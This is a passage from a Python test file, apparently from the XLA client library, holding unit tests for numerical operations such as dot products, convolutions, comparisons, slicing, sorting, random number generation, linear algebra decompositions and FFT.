c = self._NewComputation()
ops.CrossReplicaSum(ops.Constant(c, lhs))
self._ExecuteAndCompareExact(c, expected=[lhs])
def testReplicaId(self):
c = self._NewComputation()
_ = ops.ReplicaId(c)
self._ExecuteAndCompareExact(c, expected=[0])
def testCrossReplicaSumOneReplicaWithSingletonGroup(self):
samples = [
NumpyArrayF32(42.0),
NumpyArrayF32([97.0]),
NumpyArrayF32([64.0, 117.0]),
NumpyArrayF32([[2.0, 3.0], [4.0, 5.0]]),
]
for lhs in samples:
c = self._NewComputation()
ops.CrossReplicaSum(
ops.Constant(c, lhs), xla_client.make_replica_groups([[0]]))
self._ExecuteAndCompareExact(c, expected=[lhs])
# TODO(phawkins): np.dot implementation doesn't support bfloat16
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes if dtype != bfloat16)
def testDotMatrixVector(self, dtype):
c = self._NewComputation()
lhs = np.array([[2.0, 3.0], [4.0, 5.0]], dtype=dtype)
rhs = np.array([[10.0], [20.0]], dtype=dtype)
ops.Dot(ops.Constant(c, lhs), ops.Constant(c, rhs))
self._ExecuteAndCompareClose(c, expected=[np.dot(lhs, rhs)])
# TODO(phawkins): np.dot implementation doesn't support bfloat16
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes if dtype != bfloat16)
def testDotMatrixMatrix(self, dtype):
c = self._NewComputation()
lhs = np.array([[2.0, 3.0], [4.0, 5.0]], dtype=dtype)
rhs = np.array([[10.0, 20.0], [100.0, 200.0]], dtype=dtype)
ops.Dot(ops.Constant(c, lhs), ops.Constant(c, rhs))
self._ExecuteAndCompareClose(c, expected=[np.dot(lhs, rhs)])
def testDotGeneral(self):
c = self._NewComputation()
rng = np.random.RandomState(0)
lhs = NumpyArrayF32(rng.randn(10, 3, 4))
rhs = NumpyArrayF32(rng.randn(10, 4, 5))
dimension_numbers = xla_client.make_dot_dimension_numbers(
(([2], [1]), ([0], [0])))
ops.DotGeneral(
ops.Constant(c, lhs), ops.Constant(c, rhs), dimension_numbers)
self._ExecuteAndCompareClose(c, expected=[np.matmul(lhs, rhs)], rtol=1e-6)
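# The dimension numbers above read: contract lhs dim 2 against rhs dim 1 and
# batch over dim 0 of both operands, i.e. (illustrative, not executed)
#     np.einsum('bij,bjk->bik', lhs, rhs)
# which for these shapes equals np.matmul(lhs, rhs).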
def testDotGeneralWithDotDimensionNumbersProto(self):
c = self._NewComputation()
rng = np.random.RandomState(0)
lhs = NumpyArrayF32(rng.randn(10, 3, 4))
rhs = NumpyArrayF32(rng.randn(10, 4, 5))
dimension_numbers = xla_client.DotDimensionNumbers()
dimension_numbers.lhs_contracting_dimensions.append(2)
dimension_numbers.rhs_contracting_dimensions.append(1)
dimension_numbers.lhs_batch_dimensions.append(0)
dimension_numbers.rhs_batch_dimensions.append(0)
ops.DotGeneral(
ops.Constant(c, lhs), ops.Constant(c, rhs), dimension_numbers)
self._ExecuteAndCompareClose(c, expected=[np.matmul(lhs, rhs)], rtol=1e-6)
def testDotGeneralWithPrecisionConfig(self):
c = self._NewComputation()
rng = np.random.RandomState(0)
lhs = NumpyArrayF32(rng.randn(10, 3, 4))
rhs = NumpyArrayF32(rng.randn(10, 4, 5))
dimension_numbers = xla_client.make_dot_dimension_numbers(
(([2], [1]), ([0], [0])))
config = xla_client.PrecisionConfig()
config.operand_precision.append(config.Precision.HIGH)
config.operand_precision.append(config.Precision.HIGHEST)
ops.DotGeneral(
ops.Constant(c, lhs),
ops.Constant(c, rhs),
dimension_numbers,
precision_config=config)
self._ExecuteAndCompareClose(c, expected=[np.matmul(lhs, rhs)], rtol=1e-6)
def testConvGeneralDilatedF32(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 1, 2, 3)
rhs = a(1, 1, 1, 2) * 10
strides = [1, 1]
pads = [(1, 0), (0, 1)]
lhs_dilation = (2, 1)
rhs_dilation = (1, 1)
dimension_numbers = xla_client.make_convolution_dimension_numbers(
("NCHW", "OIHW", "NCHW"), 2)
ops.ConvGeneralDilated(
ops.Constant(c, lhs), ops.Constant(c, rhs), strides, pads,
lhs_dilation, rhs_dilation, dimension_numbers)
result = np.array([[[
[0., 0., 0.],
[10., 20., 0.],
[0., 0., 0.],
[40., 50., 0.],
]]])
self._ExecuteAndCompareClose(c, expected=[result])
def testConvGeneralDilatedF32WithPrecisionConfig(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 1, 2, 3)
rhs = a(1, 1, 1, 2) * 10
strides = [1, 1]
pads = [(1, 0), (0, 1)]
lhs_dilation = (2, 1)
rhs_dilation = (1, 1)
dimension_numbers = xla_client.make_convolution_dimension_numbers(
("NCHW", "OIHW", "NCHW"), 2)
config = xla_client.PrecisionConfig()
config.operand_precision.append(config.Precision.HIGHEST)
config.operand_precision.append(config.Precision.DEFAULT)
ops.ConvGeneralDilated(
ops.Constant(c, lhs),
ops.Constant(c, rhs),
strides,
pads,
lhs_dilation,
rhs_dilation,
dimension_numbers,
precision_config=config)
result = np.array([[[
[0., 0., 0.],
[10., 20., 0.],
[0., 0., 0.],
[40., 50., 0.],
]]])
self._ExecuteAndCompareClose(c, expected=[result])
def testConvGeneralDilatedPermutedF32(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 1, 2, 3)
rhs = a(1, 1, 1, 2) * 10
strides = [1, 1]
pads = [(1, 0), (0, 1)]
lhs_dilation = (2, 1)
rhs_dilation = (1, 1)
dimension_numbers = xla_client.make_convolution_dimension_numbers(
("NHWC", "OIHW", "CWNH"), 2)
ops.ConvGeneralDilated(
ops.Constant(c, np.transpose(lhs,
(0, 2, 3, 1))), ops.Constant(c, rhs),
strides, pads, lhs_dilation, rhs_dilation, dimension_numbers)
result = np.array([[[[0., 0., 0.], [10., 20., 0.], [0., 0., 0.],
[40., 50., 0.]]]])
self._ExecuteAndCompareClose(
c, expected=[np.transpose(result, (1, 3, 0, 2))])
def testConvGeneralDilatedGroupedConvolutionF32(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 2, 2, 3)
rhs = a(2, 1, 1, 2) * 10
strides = [1, 1]
pads = [(1, 0), (0, 1)]
lhs_dilation = (2, 1)
rhs_dilation = (1, 1)
dimension_numbers = xla_client.make_convolution_dimension_numbers(
("NCHW", "OIHW", "NCHW"), 2)
feature_group_count = 2
ops.ConvGeneralDilated(
ops.Constant(c, lhs), ops.Constant(c, rhs), strides, pads,
lhs_dilation, rhs_dilation, dimension_numbers, feature_group_count)
result = np.array([[[
[0., 0., 0.],
[10., 20., 0.],
[0., 0., 0.],
[40., 50., 0.],
], [
[0., 0., 0.],
[330., 380., 160.],
[0., 0., 0.],
[480., 530., 220.],
]]])
self._ExecuteAndCompareClose(c, expected=[result])
def testBooleanNot(self):
c = self._NewComputation()
arr = NumpyArrayBool([True, False, True])
ops.Not(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[~arr])
def testPopulationCount(self):
c = self._NewComputation()
arr = NumpyArrayS32([3, 0, 1])
ops.PopulationCount(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[np.array([2, 0, 1])])
def testCountLeadingZeros(self):
c = self._NewComputation()
arr = NumpyArrayS32([0x7FFF, 0x12345678])
ops.Clz(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[[17, 3]])
def testExp(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
ops.Exp(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[np.exp(arr)])
def testExpm1(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
ops.Expm1(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[np.expm1(arr)])
def testRound(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
ops.Round(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[np.round(arr)])
def testLog(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
ops.Log(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[np.log(arr)])
def testLog1p(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
ops.Log1p(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[np.log1p(arr)])
def testNeg(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
ops.Neg(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[-arr])
def testFloor(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
ops.Floor(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[np.floor(arr)])
def testCeil(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
ops.Ceil(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[np.ceil(arr)])
def testAbs(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, -12.1, 2.4, -1.])
ops.Abs(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[np.abs(arr)])
def testTanhF32(self):
c = self._NewComputation()
arr = NumpyArrayF32([-0.2, 3.3, 12.1, 0.1, 0.0001])
ops.Tanh(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[np.tanh(arr)])
def testTanhF64(self):
if self.backend.platform == "tpu":
self.skipTest("TPU doesn't support 64bit tanh")
c = self._NewComputation()
arr = NumpyArrayF64([-0.2, 3.3, 12.1, 0.1, 0.0001])
ops.Tanh(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[np.tanh(arr)], rtol=1e-12)
def testTranspose(self):
def _TransposeAndTest(array, permutation):
c = self._NewComputation()
ops.Transpose(ops.Constant(c, array), permutation)
expected = np.transpose(array, permutation)
self._ExecuteAndCompareClose(c, expected=[expected])
_TransposeAndTest(NumpyArrayF32([[1, 2, 3], [4, 5, 6]]), [0, 1])
_TransposeAndTest(NumpyArrayF32([[1, 2, 3], [4, 5, 6]]), [1, 0])
_TransposeAndTest(NumpyArrayF32([[1, 2], [4, 5]]), [0, 1])
_TransposeAndTest(NumpyArrayF32([[1, 2], [4, 5]]), [1, 0])
arr = np.random.RandomState(0).randn(2, 3, 4).astype(np.float32)
for permutation in itertools.permutations(range(arr.ndim)):
_TransposeAndTest(arr, permutation)
_TransposeAndTest(np.asfortranarray(arr), permutation)
def testEq(self):
c = self._NewComputation()
ops.Eq(
ops.Constant(c, NumpyArrayS32([1, 2, 3, 4])),
ops.Constant(c, NumpyArrayS32([4, 2, 3, 1])))
self._ExecuteAndCompareExact(c, expected=[[False, True, True, False]])
def testNe(self):
c = self._NewComputation()
ops.Ne(
ops.Constant(c, NumpyArrayS32([1, 2, 3, 4])),
ops.Constant(c, NumpyArrayS32([4, 2, 3, 1])))
self._ExecuteAndCompareExact(c, expected=[[True, False, False, True]])
ops.Ne(
ops.Constant(c, NumpyArrayF32([-2.0, 0.0,
float("nan"),
float("nan")])),
ops.Constant(c, NumpyArrayF32([2.0, -0.0, 1.0,
float("nan")])))
self._ExecuteAndAssertWith(
np.testing.assert_allclose,
c, (),
expected=[[True, False, True, True]])
def testGt(self):
c = self._NewComputation()
ops.Gt(
ops.Constant(c, NumpyArrayS32([1, 2, 3, 4, 9])),
ops.Constant(c, NumpyArrayS32([1, 0, 2, 7, 12])))
self._ExecuteAndCompareExact(
c, expected=[[False, True, True, False, False]])
def testGe(self):
c = self._NewComputation()
ops.Ge(
ops.Constant(c, NumpyArrayS32([1, 2, 3, 4, 9])),
ops.Constant(c, NumpyArrayS32([1, 0, 2, 7, 12])))
self._ExecuteAndCompareExact(
c, expected=[[True, True, True, False, False]])
def testLt(self):
c = self._NewComputation()
ops.Lt(
ops.Constant(c, NumpyArrayS32([1, 2, 3, 4, 9])),
ops.Constant(c, NumpyArrayS32([1, 0, 2, 7, 12])))
self._ExecuteAndCompareExact(
c, expected=[[False, False, False, True, True]])
def testLe(self):
c = self._NewComputation()
ops.Le(
ops.Constant(c, NumpyArrayS32([1, 2, 3, 4, 9])),
ops.Constant(c, NumpyArrayS32([1, 0, 2, 7, 12])))
self._ExecuteAndCompareExact(
c, expected=[[True, False, False, True, True]])
def testMax(self):
c = self._NewComputation()
ops.Max(
ops.Constant(c, NumpyArrayF32([1.0, 2.0, 3.0, 4.0, 9.0])),
ops.Constant(c, NumpyArrayF32([1.0, 0.0, 2.0, 7.0, 12.0])))
self._ExecuteAndCompareExact(c, expected=[[1.0, 2.0, 3.0, 7.0, 12.0]])
def testMaxExplicitBroadcastDim0(self):
c = self._NewComputation()
ops.Max(
ops.Constant(c, NumpyArrayF32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
ops.Constant(c, NumpyArrayF32([3, 4, 5])),
broadcast_dimensions=(0,))
self._ExecuteAndCompareExact(
c, expected=[[[3, 3, 3], [4, 5, 6], [7, 8, 9]]])
def testMaxExplicitBroadcastDim1(self):
c = self._NewComputation()
ops.Max(
ops.Constant(c, NumpyArrayF32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
ops.Constant(c, NumpyArrayF32([3, 4, 5])),
broadcast_dimensions=(1,))
self._ExecuteAndCompareExact(
c, expected=[[[3, 4, 5], [4, 5, 6], [7, 8, 9]]])
def testMin(self):
c = self._NewComputation()
ops.Min(
ops.Constant(c, NumpyArrayF32([1.0, 2.0, 3.0, 4.0, 9.0])),
ops.Constant(c, NumpyArrayF32([1.0, 0.0, 2.0, 7.0, 12.0])))
self._ExecuteAndCompareExact(c, expected=[[1.0, 0.0, 2.0, 4.0, 9.0]])
def testPad(self):
c = self._NewComputation()
ops.Pad(
ops.Constant(c, NumpyArrayF32([[1.0, 2.0], [3.0, 4.0]])),
ops.Constant(c, NumpyArrayF32(0.0)),
xla_client.make_padding_config([(1, 2, 1), (0, 1, 0)]))
self._ExecuteAndCompareClose(
c,
expected=[[[0.0, 0.0, 0.0], [1.0, 2.0, 0.0], [0.0, 0.0, 0.0],
[3.0, 4.0, 0.0], [0.0, 0.0, 0.0], [0.0, 0.0, 0.0]]])
def testPadWithPaddingConfig(self):
c = self._NewComputation()
padding_config = xla_client.PaddingConfig()
for lo, hi, interior in [(1, 2, 1), (0, 1, 0)]:
dimension = xla_client.PaddingConfigDimension()
dimension.edge_padding_low = lo
dimension.edge_padding_high = hi
dimension.interior_padding = interior
padding_config.dimensions.append(dimension)
ops.Pad(
ops.Constant(c, NumpyArrayF32([[1.0, 2.0], [3.0, 4.0]])),
ops.Constant(c, NumpyArrayF32(0.0)), padding_config)
self._ExecuteAndCompareClose(
c,
expected=[[[0.0, 0.0, 0.0], [1.0, 2.0, 0.0], [0.0, 0.0, 0.0],
[3.0, 4.0, 0.0], [0.0, 0.0, 0.0], [0.0, 0.0, 0.0]]])
def testReshape(self):
c = self._NewComputation()
ops.Reshape(
ops.Constant(c, NumpyArrayS32([[1, 2], [3, 4], [5, 6]])),
dimensions=[0, 1],
new_sizes=[2, 3])
self._ExecuteAndCompareExact(c, expected=[[[1, 2, 3], [4, 5, 6]]])
def testCollapse(self):
c = self._NewComputation()
ops.Collapse(
ops.Constant(c, NumpyArrayS32([[[1, 2], [3, 4]], [[5, 6], [7, 8]]])),
dimensions=[1, 2])
self._ExecuteAndCompareExact(c, expected=[[[1, 2, 3, 4], [5, 6, 7, 8]]])
def testRev(self):
c = self._NewComputation()
ops.Rev(
ops.Constant(c, NumpyArrayS32([[[1, 2], [3, 4]], [[5, 6], [7, 8]]])),
dimensions=[0, 2])
self._ExecuteAndCompareExact(
c, expected=[[[[6, 5], [8, 7]], [[2, 1], [4, 3]]]])
def testReducePrecision(self):
c = self._NewComputation()
ops.ReducePrecision(
ops.Constant(c, NumpyArrayF32([float.fromhex("0x1.32fffep-3")])),
exponent_bits=8,
mantissa_bits=7)
self._ExecuteAndCompareClose(c, expected=[[float.fromhex("0x1.32p-3")]])
def testClampF32(self):
c = self._NewComputation()
ops.Clamp(
ops.Constant(c, NumpyArrayF32(-1)),
ops.Constant(c, NumpyArrayF32([-2, -1, 0, 1, 2, 3])),
ops.Constant(c, NumpyArrayF32(2)))
self._ExecuteAndCompareExact(c, expected=[[-1, -1, 0, 1, 2, 2]])
def testClampS32(self):
c = self._NewComputation()
ops.Clamp(
ops.Constant(c, NumpyArrayS32(-1)),
ops.Constant(c, NumpyArrayS32([-2, -1, 0, 1, 2, 3])),
ops.Constant(c, NumpyArrayS32(2)))
self._ExecuteAndCompareExact(c, expected=[[-1, -1, 0, 1, 2, 2]])
def testSelect(self):
c = self._NewComputation()
ops.Select(
ops.Constant(c, NumpyArrayBool([True, False, False, True, False])),
ops.Constant(c, NumpyArrayS32([1, 2, 3, 4, 5])),
ops.Constant(c, NumpyArrayS32([-1, -2, -3, -4, -5])))
self._ExecuteAndCompareExact(c, expected=[[1, -2, -3, 4, -5]])
def testSlice(self):
c = self._NewComputation()
ops.Slice(
ops.Constant(c, NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
[1, 0], [3, 2], [1, 1])
self._ExecuteAndCompareExact(c, expected=[[[4, 5], [7, 8]]])
def testSliceInDim(self):
c = self._NewComputation()
ops.SliceInDim(
ops.Constant(c, NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
start_index=1,
limit_index=2,
stride=1,
dimno=1)
self._ExecuteAndCompareExact(c, expected=[[[2], [5], [8]]])
ops.SliceInDim(
ops.Constant(c, NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
start_index=0,
limit_index=3,
stride=2,
dimno=0)
self._ExecuteAndCompareExact(c, expected=[[[1, 2, 3], [7, 8, 9]]])
def testDynamicSlice(self):
c = self._NewComputation()
ops.DynamicSlice(
ops.Constant(c, NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
[ops.Constant(c, NumpyArrayS32([1, 0]))], [2, 2])
self._ExecuteAndCompareExact(c, expected=[[[4, 5], [7, 8]]])
def testDynamicUpdateSlice(self):
c = self._NewComputation()
ops.DynamicUpdateSlice(
ops.Constant(c, NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
ops.Constant(c, NumpyArrayS32([[1, 2], [3, 4]])),
[ops.Constant(c, NumpyArrayS32([1, 1]))])
self._ExecuteAndCompareExact(
c, expected=[[[1, 2, 3], [4, 1, 2], [7, 3, 4]]])
def testTuple(self):
c = self._NewComputation()
ops.Tuple(c, [
ops.Constant(c, np.int32(42)),
ops.Constant(c, NumpyArrayF32([1.0, 2.0])),
ops.Constant(c, NumpyArrayBool([True, False, False, True]))
])
result = xla_client.execute_with_python_values(
self.backend.compile(c.build()), (), backend=self.backend)
self.assertLen(result, 3)
np.testing.assert_equal(result[0], 42)
np.testing.assert_allclose(result[1], [1.0, 2.0])
np.testing.assert_equal(result[2], [True, False, False, True])
def testGetTupleElement(self):
c = self._NewComputation()
ops.GetTupleElement(
ops.Tuple(c, [
ops.Constant(c, np.int32(42)),
ops.Constant(c, NumpyArrayF32([1.0, 2.0])),
ops.Constant(c, NumpyArrayBool([True, False, False, True]))
]), 1)
self._ExecuteAndCompareClose(c, expected=[[1.0, 2.0]])
def testBroadcast(self):
c = self._NewComputation()
ops.Broadcast(
ops.Constant(c, NumpyArrayS32([10, 20, 30, 40])), sizes=(3,))
self._ExecuteAndCompareExact(
c, expected=[[[10, 20, 30, 40], [10, 20, 30, 40], [10, 20, 30, 40]]])
def testBroadcastInDim(self):
c = self._NewComputation()
ops.BroadcastInDim(ops.Constant(c, NumpyArrayS32([1, 2])), [2, 2], [0])
self._ExecuteAndCompareExact(c, expected=[[[1, 1], [2, 2]]])
ops.BroadcastInDim(ops.Constant(c, NumpyArrayS32([1, 2])), [2, 2], [1])
self._ExecuteAndCompareExact(c, expected=[[[1, 2], [1, 2]]])
def testRngNormal(self):
shape = (2, 3)
c = self._NewComputation()
ops.RngNormal(
ops.Constant(c, NumpyArrayF32(0.)),
ops.Constant(c, NumpyArrayF32(1.)),
shape=xla_client.Shape.array_shape(xla_client.PrimitiveType.F32,
shape))
result = xla_client.execute_with_python_values(
self.backend.compile(c.build()), (), backend=self.backend)
# since the result is random, we just check shape and uniqueness
self.assertLen(result, 1)
self.assertEqual(result[0].shape, shape)
self.assertLen(np.unique(result[0]), np.prod(shape))
def testRngUniformF32(self):
lo, hi = 2., 4.
shape = (2, 3)
c = self._NewComputation()
ops.RngUniform(
ops.Constant(c, NumpyArrayF32(lo)),
ops.Constant(c, NumpyArrayF32(hi)),
shape=xla_client.Shape.array_shape(xla_client.PrimitiveType.F32,
shape))
result = xla_client.execute_with_python_values(
self.backend.compile(c.build()), (), backend=self.backend)
# since the result is random, we just check shape, uniqueness, and range
self.assertLen(result, 1)
self.assertEqual(result[0].shape, shape)
self.assertLen(np.unique(result[0]), np.prod(shape))
self.assertTrue(np.all(lo <= result[0]))
self.assertTrue(np.all(result[0] < hi))
def testRngUniformS32(self):
lo, hi = 2, 4
shape = (2, 3)
c = self._NewComputation()
ops.RngUniform(
ops.Constant(c, NumpyArrayS32(lo)),
ops.Constant(c, NumpyArrayS32(hi)),
shape=xla_client.Shape.array_shape(xla_client.PrimitiveType.S32,
shape))
result = xla_client.execute_with_python_values(
self.backend.compile(c.build()), (), backend=self.backend)
# since the result is random, we just check shape, integrality, and range
self.assertLen(result, 1)
self.assertEqual(result[0].shape, shape)
self.assertEqual(result[0].dtype, np.int32)
self.assertTrue(np.all(lo <= result[0]))
self.assertTrue(np.all(result[0] < hi))
def testCholesky(self):
l = np.array([[4, 0, 0, 0], [6, 5, 0, 0], [2, 14, 16, 0], [3, 6, 1, 4]],
dtype=np.float32)
c = self._NewComputation()
ops.Cholesky(ops.Constant(c, np.tril(np.dot(l, l.T))))
self._ExecuteAndCompareClose(c, expected=[l], rtol=1e-4)
def testSort(self):
keys = np.array([[2, 4, 1, 3], [3, 1, 4, 2]], dtype=np.float32)
c = self._NewComputation()
ops.Sort(c, [ops.Constant(c, keys)], is_stable=True)
self._ExecuteAndCompareClose(
c,
expected=[np.array([[1, 2, 3, 4], [1, 2, 3, 4]], dtype=np.float32)])
def testSortKeyVal(self):
keys = np.array([[2, 4, 1, 3], [3, 1, 4, 2]], dtype=np.float32)
values = np.array([[0, 1, 2, 3], [4, 5, 6, 7]], dtype=np.int32)
c = self._NewComputation()
ops.Sort(c, (ops.Constant(c, keys), ops.Constant(c, values)), dimension=0)
result = xla_client.execute_with_python_values(
self.backend.compile(c.build()), (), backend=self.backend)
self.assertLen(result, 2)
np.testing.assert_allclose(result[0], [[2, 1, 1, 2], [3, 4, 4, 3]])
np.testing.assert_equal(result[1], [[0, 5, 2, 7], [4, 1, 6, 3]])
def testSortCustomComparator(self):
b = self._NewComputation("comparator")
p0 = ops.Parameter(b, 0, xla_client.shape_from_pyval(NumpyArrayF32(0)))
q0 = ops.Parameter(b, 1, xla_client.shape_from_pyval(NumpyArrayF32(0)))
p1 = ops.Parameter(b, 2, xla_client.shape_from_pyval(NumpyArrayS32(0)))
q1 = ops.Parameter(b, 3, xla_client.shape_from_pyval(NumpyArrayS32(0)))
ops.Or(ops.Lt(p0, q0), ops.And(ops.Eq(p0, q0), ops.Gt(p1, q1)))
comparator = b.build()
keys = np.array([[2, 3, 1, 3], [3, 1, 2, 2]], dtype=np.float32)
values = np.array([[0, 1, 2, 3], [4, 5, 6, 7]], dtype=np.int32)
c = self._NewComputation()
ops.Sort(
c, (ops.Constant(c, keys), ops.Constant(c, values)),
dimension=1,
comparator=comparator)
result = xla_client.execute_with_python_values(
self.backend.compile(c.build()), (), backend=self.backend)
self.assertLen(result, 2)
np.testing.assert_allclose(result[0], [[1, 2, 3, 3], [1, 2, 2, 3]])
np.testing.assert_equal(result[1], [[2, 0, 3, 1], [5, 7, 6, 4]])
def testQR(self):
a = np.array([[4, 6, 8, 10], [6, 45, 54, 63], [8, 54, 146, 166],
[10, 63, 166, 310]],
dtype=np.float32)
c = self._NewComputation()
ops.Tuple(c, ops.QR(ops.Constant(c, a), full_matrices=True))
q, r = self._Execute(c, ())
np.testing.assert_allclose(np.dot(q, r), a, rtol=1e-4)
def testEigh(self):
a = np.array([[4, 6, 8, 10], [6, 45, 54, 63], [8, 54, 146, 166],
[10, 63, 166, 310]],
dtype=np.float32)
a = (a + a.T) / 2
c = self._NewComputation()
ops.Tuple(c, ops.Eigh(ops.Constant(c, a), lower=True))
# TODO(b/129396575): Turn this test back on when it passes without
# fastmath.
# v, w = self._Execute(c, ())
# self.assertLess(np.linalg.norm(np.dot(a, v) - w * v), 1e-3)
def testSVD(self):
a = np.array([[4, 6, 8, 10], [6, 45, 54, 63], [8, 54, 146, 166],
[10, 63, 166, 310]],
dtype=np.float32)
c = self._NewComputation()
ops.Tuple(c, ops.SVD(ops.Constant(c, a)))
u, d, v = self._Execute(c, ())
self.assertLess(np.linalg.norm(a - np.matmul(u * d, v.T)), 1e-3)
def testTriangularSolve(self):
a_vals = np.array(
[[2, 0, 0, 0], [3, 6, 0, 0], [4, 7, 9, 0], [5, 8, 10, 11]],
dtype=np.float32)
b_vals = np.array([[1, 2, 3, 4], [5, 6, 7, 8], [9, 10, 11, 12]],
dtype=np.float32)
c = self._NewComputation()
ops.TriangularSolve(
ops.Constant(c, a_vals),
ops.Constant(c, b_vals),
left_side=False,
lower=True,
transpose_a=ops.TriangularSolveOptions_Transpose.TRANSPOSE,
unit_diagonal=False)
self._ExecuteAndCompareClose(
c,
expected=[
np.array([
[0.5, 0.08333334, 0.04629629, 0.03367003],
[2.5, -0.25, -0.1388889, -0.1010101],
[4.5, -0.58333331, -0.32407406, -0.23569024],
],
dtype=np.float32)
],
rtol=1e-4)
def testIsConstant(self):
c = self._NewComputation()
a = ops.Constant(c, np.int32(3))
b = ops.Constant(c, np.int32(1))
x = ops.Parameter(c, 0, xla_client.shape_from_pyval(NumpyArrayS32(0)))
const_expr = ops.Sub(b, a)
non_const_expr = ops.Mul(const_expr, x)
self.assertTrue(c.is_constant(const_expr))
self.assertFalse(c.is_constant(non_const_expr))
def testGather(self):
a = np.arange(9).astype(np.int32).reshape((3, 3))
indices = np.array([[[0, 2], [2, 1]], [[1, 2], [2, 0]]], dtype=np.int32)
dnums = xla_client.GatherDimensionNumbers()
dnums.offset_dims.append(1)
dnums.offset_dims.append(2)
dnums.start_index_map.append(0)
dnums.start_index_map.append(1)
dnums.index_vector_dim = 2
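      # With index_vector_dim=2, each trailing pair in `indices` is a (row, col)
      # start index into `a`; slice_sizes=[1, 1] gathers one element per index.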
c = self._NewComputation()
ops.Gather(
ops.Constant(c, a),
ops.Constant(c, indices),
dnums,
slice_sizes=[1, 1])
g, = self._Execute(c, ())
expected = np.array([[[[2, 7]]], [[[5, 6]]]], dtype=np.int32)
np.testing.assert_allclose(g, expected, rtol=1e-4)
def testFft(self):
if self.backend.platform == "tpu":
self.skipTest("TPU only supports 1D FFT")
shape = [2, 3, 4, 5]
rng = np.random.RandomState(0)
a = rng.randn(*shape) + 1.0j * rng.randn(*shape)
a = a.astype(np.complex64)
# FFT
c = self._NewComputation()
ops.Fft(ops.Constant(c, a), xla_client.FftType.FFT, shape[-3:])
self._ExecuteAndCompareClose(
c, expected=[np.fft.fftn(a, axes=(1, 2, 3))], rtol=1e-4)
# IFFT
c = self._NewComputation()
ops.Fft(ops.Constant(c, a), xla_client.FftType.IFFT, shape[-3:])
self._ExecuteAndCompareClose(
c, expected=[np.fft.ifftn(a, axes=(1, 2, 3))], rtol=1e-4)
# RFFT
b = rng.randn(*shape).astype(np.float32)
c = self._NewComputation()
ops.Fft(ops.Constant(c, b), xla_client.FftType.RFFT, shape[-3:])
self._ExecuteAndCompareClose(
c, expected=[np.fft.rfftn(b, axes=(1, 2, 3))], rtol=1e-4)
# IRFFT
c = self._NewComputation()
ops.Fft(ops.Constant(c, a), xla_client.FftType.IRFFT, [3, 4, 8])
self._ExecuteAndCompareClose(
c, expected=[np.fft.irfftn(a, axes=(1, 2, 3))], rtol=1e-4)
def testNextAfter(self):
c = self._NewComputation()
ops.NextAfter(
ops.Constant(c, np.array([1, 2], dtype=np.float32)),
ops.Constant(c, np.array([2, 1], dtype=np.float32)))
out, = self._Execute(c, ())
eps = np.finfo(np.float32).eps
np.testing.assert_equal(
np.array([eps + 1, 2 - eps], dtype=np.float32), out)
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testRegularizedIncompleteBeta(self, dtype):
x = np.array([0.53787335, 0.24015466, 0.47494545, 0.13567594, 0.95114538],
dtype=dtype)
a = np.array([0.00753073, 0.34813385, 0.30485708, 1.29298632, 0.51472606],
dtype=dtype)
b = np.array([0.55688389, 0.59794214, 0.42661022, 1.59748339, 0.95047677],
dtype=dtype)
c = self._NewComputation()
ops.RegularizedIncompleteBeta(
ops.Constant(c, a), ops.Constant(c, b), ops.Constant(c, x))
expected = np.array(
[0.98923271, 0.48575411, 0.57952568, 0.12579775, 0.96989155])
self._ExecuteAndCompareClose(c, expected=[expected], rtol=2e-2)
tests.append(SingleOpTest)
class EmbeddedComputationsTest(ComputationTest):
"""Tests for XLA graphs with embedded computations (such as maps)."""
def _CreateConstantComputation(self, in_dtype, out_dtype):
"""Computation (A) -> B that returns a constant 1 for any input."""
c = self._NewComputation("constant_{}_{}_one".format(
in_dtype.__name__, out_dtype.__name__))
ops.Parameter(c, 0,
xla_client.shape_from_pyval(np.array(0, dtype=in_dtype)))
ops.Constant(c, out_dtype(1))
return c.build()
